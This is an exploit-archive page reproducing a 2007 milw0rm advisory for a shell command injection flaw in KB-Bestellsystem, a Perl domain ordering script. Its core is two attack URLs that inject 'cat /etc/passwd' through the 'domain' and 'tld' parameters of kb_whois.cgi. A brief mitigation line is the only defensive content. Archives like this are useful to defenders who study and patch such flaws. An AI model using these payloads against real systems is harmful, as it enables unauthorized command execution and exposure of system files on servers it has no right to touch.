header-logo
Suggest Exploit
vendor:
KB-Bestellsystem
by:
milw0rm.com
7.5
CVSS
HIGH
Shell Metacharacter Filtering Bypass
78
CWE
Product Name: KB-Bestellsystem
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

KB-Bestellsystem Perl Domain Order System Shell Metacharacter Filtering Bypass

"KB-Bestellsystem" is a domain order system written in Perl. The "domain" and "tld" parameters in "kb_whois.cgi" are not filtering shell metacharacters. The following examples will show you the /etc/passwd file:http://targethost.com/kb-bestellsystem/kb_whois.cgi?action=check_owner&domain=;cat%20/etc/passwd;&tld=.com&tarrif=http://targethost.com/kb-bestellsystem/kb_whois.cgi?action=check_owner&domain=google&tld=.com;cat /etc/passwd;&tarrif=<< Greetz Zero X >>

Mitigation:

Implement proper input validation and filtering on the "domain" and "tld" parameters in "kb_whois.cgi" to prevent shell metacharacter bypass.
Source

Exploit-DB raw data:

"KB-Bestellsystem" is a domain order system written in Perl.
The "domain" and "tld" parameters in "kb_whois.cgi" are not filtering shell metacharacters.

The following examples will show you the /etc/passwd file:

http://targethost.com/kb-bestellsystem/kb_whois.cgi?action=check_owner&domain=;cat%20/etc/passwd;&tld=.com&tarrif=
http://targethost.com/kb-bestellsystem/kb_whois.cgi?action=check_owner&domain=google&tld=.com;cat /etc/passwd;&tarrif=

<< Greetz Zero X >>

# milw0rm.com [2007-11-22]

Navigation

Suggest Exploit

Services By CQR